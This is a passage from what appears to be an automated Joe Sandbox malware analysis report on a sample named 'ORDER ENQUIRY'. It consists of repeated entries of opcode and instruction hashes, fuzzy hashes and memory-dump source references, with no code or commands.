                                                                                                                                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                          • Instruction Fuzzy Hash: 9CF0E539204B819BDB1ACF19C190AD6BBF8FB51350F0444D4F8468B352D731E9C2CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                          • Instruction ID: d476f3aa9ce4420087ec6d112fdcc9c9d87e4470872beac6c5fd305746011f09
                                                                                                                                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                          • Instruction Fuzzy Hash: 35E0D832744145AFD3211A598818B667FEEDBD87F0F150429E200CB150DB70DC40C7D8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: bcdcf97cec59490a61132c4629eddaf826f513c51a9da08f7b61ffd036057089
                                                                                                                                                                          • Instruction ID: c2371d8c0c0b3db3ba612af5e251bb35667c0eda1603c21a2478307c1ef289ab
                                                                                                                                                                          • Opcode Fuzzy Hash: bcdcf97cec59490a61132c4629eddaf826f513c51a9da08f7b61ffd036057089
                                                                                                                                                                          • Instruction Fuzzy Hash: 29F06D31A2AA938FE77AF72DE684B567FE4EF10E30F9A05E4D44587952C724EC80C650
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                          • Instruction ID: 0a495ff303b1fc8c0540f298fa19f6639044a7d07ccc4d012e4bc8a8e28072ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                          • Instruction Fuzzy Hash: D0E0DF72A00110FBEB219799CE05F9ABFACDB94FA0F050194FA00E7090E630EE00C690
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                          • Instruction ID: 0a078d4340c0ca874b7809725ff4e13b67a405ac449abc29eca4afcfb4681f2e
                                                                                                                                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                          • Instruction Fuzzy Hash: D6E09B316513508BCB29BA1DC540A53B7E8DF95AA1F1580E9E90547612C331F887C6D0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: a1c2839884b0141afdcdac42122c4855e4fe10eed0a52cbdafd78d649744c46c
                                                                                                                                                                          • Instruction ID: eae1dbd99fd5c8a5505bc5c932aa2e541ac1bbb068460eb6cb4dfee25c425f41
                                                                                                                                                                          • Opcode Fuzzy Hash: a1c2839884b0141afdcdac42122c4855e4fe10eed0a52cbdafd78d649744c46c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4EE092721005949BC721BF29DE41FDA7B9AEF64760F01451AF11657191CB30B810C784
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                          • Instruction ID: 78876262e0ffc645c82eeb305209d41723505c4554ccb75046ba27258aa376dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                          • Instruction Fuzzy Hash: 4DE01231010A52DFEB366F3ADE48B56BAE5FF60B11F148C6DE196264B0C779D8C1CA40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                          • Instruction ID: 6df7d93a54769f6f74a6394dc340b70d286e239823c61c287276bfb97cc27ab4
                                                                                                                                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DE052793003459FE719CF19C054B66BBB6FFD9A50F28C0A9A9488F205EB36E852CB51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 171a582530e72054139fe4b2bfaf921c5fb72bb456a363575702be35a3bd55a7
                                                                                                                                                                          • Instruction ID: 3a8c14fa54b6f3ba469d251eab54d46767e688ea2e74d3dd59efac7671bfa948
                                                                                                                                                                          • Opcode Fuzzy Hash: 171a582530e72054139fe4b2bfaf921c5fb72bb456a363575702be35a3bd55a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 45D02B725811206ACB35F2197D08F933ADB9B50670F054861F10893014D524CC8197C4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                          • Instruction ID: e57f1ecbae618b00f3c2963ceef024db7f68c5e324380c7770d206f5bbcd2f19
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                          • Instruction Fuzzy Hash: 34E08C31044A14EEDB322F15DE00B61BAA1FF64F11F14886EF181170A48779A889CA44
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c97267b3f575f3aae907c93bbf8a8c756b4e34258c7351dcc60e90fcd917cb8d
                                                                                                                                                                          • Instruction ID: 72a3267f3191dcf1b2322957329223565516c18bfe1b406580fc7d181e2c4a11
                                                                                                                                                                          • Opcode Fuzzy Hash: c97267b3f575f3aae907c93bbf8a8c756b4e34258c7351dcc60e90fcd917cb8d
                                                                                                                                                                          • Instruction Fuzzy Hash: 75E08C321004906BC711FA5DDE51F9A739EEFA4660F044226F15197291CA20BC00C794
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                          • Instruction ID: 59acb9d7fa318bb49b63985ebc073bb9bbee1cc39dacc8fd1d312b96324bafa0
                                                                                                                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                          • Instruction Fuzzy Hash: 16E08633111A1487C728DE18D515B7277E4EF45720F09463EE61347790C534E544C794
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                          • Instruction ID: a073ddb89d79841198a3163261d318ccb815524bea6e05c5d17f5ac56abc4e2a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                          • Instruction Fuzzy Hash: 0FD05E36511A50AFC7329F1BEA00C53BBF9FFC4F60705066EA54583920C770A846CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                          • Instruction ID: b467d5e157198fc838ead3153ccedd05926df797bc0e859d69952399d4cb9cfa
                                                                                                                                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0A932208620ABDB32AA1CFC00FD333E8BB88B20F060499F00CC7050C360AC81CA84
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                          • Instruction ID: 06edfa74ff26eb421f215a4e3ae4c318020e29d7cd43d77ff29a4607d216b827
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE0EC35A506849FDF16DF9AC640F9EBBB9FB94B40F150058E5086B661C734E904CB40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                          • Instruction ID: aa4f88f4174a9b8903d4a277b7d102d2d4a1bc82470249b3e9dda93264e9950b
                                                                                                                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 07D02232316030A3CF2897556900FAB6955AF80AA0F0A002D340AA3800C2048C42C2E0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                          • Instruction ID: 55c576427c72930a577e2b0e1f2ce40851695db2ee49cb755cbbe8f0fb096c69
                                                                                                                                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                          • Instruction Fuzzy Hash: 55D012371D054DBBCB119F66DD01FA57BA9EB64BA0F448020B504875A0C63AE950D584
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 51addb58dcc16d3a7c4423ff79d437b4ef5a32486159eba029ec606f1c319021
                                                                                                                                                                          • Instruction ID: e6799e4895ae886e9f79eb7579f968ea6105983458fa16af9d7d4a35c4066fe9
                                                                                                                                                                          • Opcode Fuzzy Hash: 51addb58dcc16d3a7c4423ff79d437b4ef5a32486159eba029ec606f1c319021
                                                                                                                                                                          • Instruction Fuzzy Hash: 95D052306050128BDF2BEF0CCA1AAAE3AF1EB10A40F8400ACE601A2820E328D8018A00
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                          • Instruction ID: e4f522411066833b7f6027ddb9a7c5cc510c628aade6bbfbfdd512b92452b97d
                                                                                                                                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                          • Instruction Fuzzy Hash: 59D09239216A80CFD61A8B0CC6A4B1533A4BB44F44F810494E542CBB22E738D940CA00
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                          • Instruction ID: 39c6356e3b218ec3ec5d3e0875b087b78aaaacf5de10ef8f48bdeb252cc69b92
                                                                                                                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                          • Instruction Fuzzy Hash: 72C01232294648AFCB12AA99CE01F567BA9EBA8B40F004021F2048B670C631E820EA84
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                          • Instruction ID: 945f9f359f3150a890a83dd0a908ced02616fd7974c9df93719e511b2101eb68
                                                                                                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                          • Instruction Fuzzy Hash: 0CD01236100648EFCB01DF41C990D9A772AFBD8710F109019FD1A076108A31ED62DA50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                          • Instruction ID: ba5618fea5925754fff37e5b6a882f0acd3271be4eb2f86f45c59d4af3fcafe9
                                                                                                                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                          • Instruction Fuzzy Hash: C0C00179601A428BCF2ADA2AD294A897BE4FB44B40F158894E8058BA22E625E805CA10
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b43cbe1bdcb8e10c698f962277132892c8a30dd586c7d7df7e37fdea6b56ab73
                                                                                                                                                                          • Instruction ID: a12443446d09224e728f8999279bf5d5caf9e78f602ed6201a16c79eeafef76f
                                                                                                                                                                          • Opcode Fuzzy Hash: b43cbe1bdcb8e10c698f962277132892c8a30dd586c7d7df7e37fdea6b56ab73
                                                                                                                                                                          • Instruction Fuzzy Hash: 70900232A05C00529145715848845464405A7E0341B55C051E0424599CCB148B965361
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ef48d3dee61833e0455841e0436e7a38f1afb0a3d8a717206c54312fdfcb5e58
                                                                                                                                                                          • Instruction ID: e703d5ef34a8f9766725669a971cddb0da5a9b506aa7fe589aa9ccb8eb0ce052
                                                                                                                                                                          • Opcode Fuzzy Hash: ef48d3dee61833e0455841e0436e7a38f1afb0a3d8a717206c54312fdfcb5e58
                                                                                                                                                                          • Instruction Fuzzy Hash: 21900262A01900824145715848044066405A7E1341395C155A05545A5CC7188A959369
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cb24a0fb3495b775a1e35f9d45a0fceac8b225d336e59759c6826cd7439d4c04
                                                                                                                                                                          • Instruction ID: ced731cc928cfa143a19720919211be567d4689f0956f32bd92dd1747561110f
                                                                                                                                                                          • Opcode Fuzzy Hash: cb24a0fb3495b775a1e35f9d45a0fceac8b225d336e59759c6826cd7439d4c04
                                                                                                                                                                          • Instruction Fuzzy Hash: AA900232A0580842D15571584414746040597D0341F55C051A0024699DC7558B9577A1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 846802bf6f6255640368420433303c5fd5f09099e0ee80c26d2f32e8dc4aca3b
                                                                                                                                                                          • Instruction ID: ad1a6fa0815f026d9ad99fc5011f1abf5ea8d1ea3c8438e3ac660859a09a8d8c
                                                                                                                                                                          • Opcode Fuzzy Hash: 846802bf6f6255640368420433303c5fd5f09099e0ee80c26d2f32e8dc4aca3b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2590023260180842D10971584804686040597D0341F55C051A602469AED7658AD17231
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8435e5a7056b0c8689feb77a97e9dccdeec74bcfeca016f11c71697055ce34a3
                                                                                                                                                                          • Instruction ID: 15516548470ec48ef1d3419e9a71eba73f05c6a52ce0b5bcd8d36894af013707
                                                                                                                                                                          • Opcode Fuzzy Hash: 8435e5a7056b0c8689feb77a97e9dccdeec74bcfeca016f11c71697055ce34a3
                                                                                                                                                                          • Instruction Fuzzy Hash: FD90023260584882D14571584404A46041597D0345F55C051A00646D9DD7258F95B761
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4c60a789e449657a5dd6de8bac6be97ed77ae8785bf166f0a837bdc70a1f3de5
                                                                                                                                                                          • Instruction ID: bac177237088708c79e3e084b29b6a71a866b31d5ca82231a11d8d1ae8f23b85
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c60a789e449657a5dd6de8bac6be97ed77ae8785bf166f0a837bdc70a1f3de5
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A9002A2601940D24505B2588404B0A490597E0241B55C056E10545A5CC6258A919235
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a5d330f372cad1043599477ea9bc9d1dca98cb34d053b26776f2f69c2bf645c2
                                                                                                                                                                          • Instruction ID: 71fe7fcd46c21bd3f7af364d6472a49690d192cc20b30bc9eceac01b21c4195f
                                                                                                                                                                          • Opcode Fuzzy Hash: a5d330f372cad1043599477ea9bc9d1dca98cb34d053b26776f2f69c2bf645c2
                                                                                                                                                                          • Instruction Fuzzy Hash: C690022662180042014AB558060450B0845A7D6391395C055F14165D5CC7218AA55321
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 93094178b70dd2280a70af3699a192e9de943d4890cbe309ab889102ff35e239
                                                                                                                                                                          • Instruction ID: 6c6e80d6a6a8c04cdc40e59521c1cc6cc2b0b11f820066e2089137e7868e111b
                                                                                                                                                                          • Opcode Fuzzy Hash: 93094178b70dd2280a70af3699a192e9de943d4890cbe309ab889102ff35e239
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B90023264180442D146715844046060409A7D0281F95C052A0424599EC7558B96AB61
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
